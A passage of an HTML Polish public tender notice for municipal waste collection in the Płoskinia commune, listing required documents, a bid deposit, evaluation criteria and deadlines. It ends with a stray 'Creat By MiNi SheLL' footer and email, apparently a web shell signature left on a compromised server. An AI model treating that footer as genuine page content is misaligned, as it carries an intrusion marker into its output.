4. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa zamiast dokumentów wymienionych w pkt. 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie z opisem przedmiotu zamówienia, wraz z załączeniem dokumentu potwierdzającego, że zamówienie zostało wykonane należycie - załącznik Nr 5 do SIWZ ; - minimum jedną usługę odbioru odpadów komunalnych z teren nieruchomości i ich transport w ilości co najmniej 300 Mg. 
2) Wykaz niezbędnego sprzętu do wykonania zamówienia, którymi dysponuje lub będzie dysponował Wykonawca z informacją o podstawie dysponowania tymi zasobami - załącznik nr 7 do SIWZ. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)Formularz ofertowy z wykorzystaniem wzoru - załącznik Nr 1 do SIWZ (oryginał). 2)Dowód wniesienia wadium. 3)Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom zamówienia  jeśli dotyczy - załącznik nr 6 do SIWZ 4)Pełnomocnictwo do reprezentowania Wykonawcy (jeżeli oferenta reprezentuje pełnomocnik  oryginał dokumentu lub kopia poświadczona notarialnie). 5)Pisemne zobowiązanie lub inny dokument podmiotów o oddaniu wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia - w przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów (na zasadach określonych w art. 22a ustawy Pzp) - załącznik nr 9 do SIWZ. 6) oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej - załącznik nr 4 do SIWZ

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający wymaga wniesienia wadium w wysokości 3 000,00 PLN (słownie; trzy tysiące złotych) 2. Wadium uznaje się za wniesione w momencie uznania na rachunku Zamawiającego (realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert). 3. Wadium musi obejmować okres związania ofertą. 4. Wadium może być wniesione w jednej lub kilku następujących formach: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowe -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem kasowym 3) gwarancjach bankowych 4) gwarancjach ubezpieczeniowych 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości(t. j. Dz. U z 2016r. poz. 359). 5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy; Braniewsko-Pasłęcki BS Oddział Braniewo Filia Płoskinia Nr 84831300090050829020000030 z dopiskiem Odbiór odpadów komunalnych od właścicieli nieruchomości z terenu gminy Płoskinia w 2017 roku 6. Zwrot oraz zatrzymanie wadium następuje zgodnie z zasadami opisanymi w art. 46 ustawy.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena Brutto</td><td>60</td></tr><tr><td>Termin płatności faktury</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Istotne dla Zamawiającego postanowienia wprowadzone do treści zawieranej umowy oraz  wysokość kar umownych z tytułu niewykonania lub nienależytego wykonania umowy zawarte są w załączniku nr 8 do SIWZ. 
2. Zamawiający przewiduje możliwość zmiany umowy zgodnie z art. 144 ust 1 ustawy jeżeli konieczność ich wprowadzenia wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności;  
1)w przypadku wystąpienia siły wyższej zmiana wymaga zgody obu stron umowy. 
Przez siłę wyższa rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i których nie mogły przeciwdziałać poprzez działanie z należyta starannością ogólnie przewidziana dla cywilnoprawnych stosunków zobowiązaniowych, 
2)zmiany podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot 
umowy na innego  dysponującego co najmniej porównywalny doświadczeniem, potencjałem technicznym i osobowym,
3)zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com